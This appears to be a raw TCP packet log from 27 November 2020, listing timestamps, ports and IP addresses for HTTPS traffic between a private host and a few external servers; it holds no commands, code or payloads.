Nov 27, 2020 18:44:36.422866106 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.422905922 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.422943115 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.422965050 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.422981977 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423022032 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423038960 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423072100 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423115969 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423154116 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423161983 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423196077 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423238039 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423258066 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423275948 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423316002 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423331022 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423355103 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423404932 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423432112 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423449993 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423489094 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423494101 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423530102 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423569918 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423578978 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423607111 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423635960 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423645020 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423686028 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423724890 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423733950 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423777103 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423791885 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423815966 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423856020 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423893929 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423904896 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.423930883 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423969030 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.423974037 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424007893 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424021006 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424056053 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424098969 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424118042 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424137115 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424176931 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424213886 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424217939 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424256086 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424278021 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424293995 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424334049 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424336910 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424381971 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424398899 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424423933 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424452066 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424489975 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424504042 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424527884 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424565077 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424598932 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424602985 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424643040 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424685955 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424690962 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424732924 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424770117 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424784899 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424808979 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424848080 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424869061 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424884081 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424921989 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.424937010 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.424958944 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425004005 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425007105 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425050974 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425054073 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425090075 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425128937 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425141096 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425168037 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425206900 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425220966 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425245047 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425283909 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425285101 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425331116 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425340891 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425373077 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425421953 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425446987 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425486088 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425504923 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425524950 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425564051 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425578117 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425601959 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425638914 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425641060 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425678968 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425681114 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425724983 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425725937 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425766945 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425769091 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425786018 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425805092 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425837040 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425843000 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425882101 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425893068 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425919056 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425924063 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425957918 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.425965071 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.425997972 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.426001072 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.426042080 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.426060915 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.444294930 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444365025 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444399118 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444428921 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444459915 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444506884 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444541931 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.444545031 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444572926 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.444585085 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.444591045 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.444647074 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.482717991 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.482763052 CET	443	49729	104.27.129.197	192.168.2.4
Nov 27, 2020 18:44:36.482889891 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.482944012 CET	49729	443	192.168.2.4	104.27.129.197
Nov 27, 2020 18:44:36.549654007 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.549767017 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.549808025 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.549848080 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.549854994 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.549885988 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.549889088 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.549938917 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.549982071 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.549997091 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550020933 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550029993 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550060987 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550076008 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550101042 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550139904 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550146103 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550178051 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550200939 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550219059 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550261021 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550266981 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550314903 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550323963 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550354004 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550384045 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550394058 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550432920 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550438881 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550471067 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550474882 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550508976 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550514936 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550548077 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550549984 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550581932 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550595045 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550599098 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550637960 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550662041 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550677061 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550702095 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550715923 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550755024 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550759077 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550782919 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550791979 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550810099 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550832033 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550869942 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550916910 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550926924 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550956964 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.550959110 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.550997019 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551016092 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551034927 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551050901 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551074028 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551090002 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551110983 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551146030 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551150084 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551197052 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551214933 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551235914 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551235914 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551275969 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551295996 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551314116 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551328897 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551361084 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551367998 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551397085 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551404953 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551441908 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551444054 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551480055 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551481009 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551512003 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551520109 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551558018 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551568031 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551589012 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551598072 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551637888 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551656961 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551693916 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551717043 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551765919 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551800966 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551843882 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551881075 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551882982 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551899910 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551918983 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551956892 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.551956892 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.551996946 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552000999 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552021980 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552033901 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552069902 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552073002 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552114964 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552120924 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552134991 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552165031 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552203894 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552207947 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552237034 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552242994 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552278042 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552282095 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552320004 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552320004 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552351952 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552357912 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552396059 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552397013 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552421093 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552444935 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552459002 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552488089 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552522898 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552525997 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552556992 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552563906 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552592993 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552601099 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:36.552645922 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:36.552665949 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:41.424185991 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:41.424235106 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:41.424262047 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:41.440888882 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:41.444089890 CET	49724	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:41.568075895 CET	443	49724	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.046298981 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.169775009 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.169888973 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.176004887 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.299576044 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.299814939 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.299863100 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.299887896 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.299902916 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.299925089 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.299935102 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.299952984 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.299983025 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.300569057 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.300651073 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.306233883 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.430085897 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.430289030 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.438112020 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:48.562244892 CET	443	49733	170.10.160.34	192.168.2.4
Nov 27, 2020 18:44:48.562387943 CET	49733	443	192.168.2.4	170.10.160.34
Nov 27, 2020 18:44:52.526122093 CET	49738	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.526206970 CET	49739	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.526242018 CET	49740	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.526247978 CET	49742	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.526258945 CET	49741	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.526324034 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.542458057 CET	443	49738	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.542500019 CET	443	49739	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.542538881 CET	443	49742	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.542567968 CET	443	49740	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.542594910 CET	443	49741	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.542610884 CET	49738	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.542622089 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.542720079 CET	49739	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.542728901 CET	49742	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.542758942 CET	49740	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.542866945 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.542867899 CET	49741	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.556684017 CET	49738	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.557356119 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.557445049 CET	49742	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.557492971 CET	49741	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.557610035 CET	49740	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.557672024 CET	49739	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.572788000 CET	443	49738	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573503971 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573542118 CET	443	49742	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573705912 CET	443	49740	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573734045 CET	443	49739	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573770046 CET	443	49741	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573813915 CET	443	49738	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573852062 CET	443	49738	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573888063 CET	443	49738	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.573930979 CET	49738	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.573991060 CET	49738	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.574480057 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.574522018 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.574557066 CET	443	49743	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.574594975 CET	443	49742	152.199.21.175	192.168.2.4
Nov 27, 2020 18:44:52.574620008 CET	49743	443	192.168.2.4	152.199.21.175
Nov 27, 2020 18:44:52.574634075 CET	443	49742	152.199.21.175	192.168.2.4
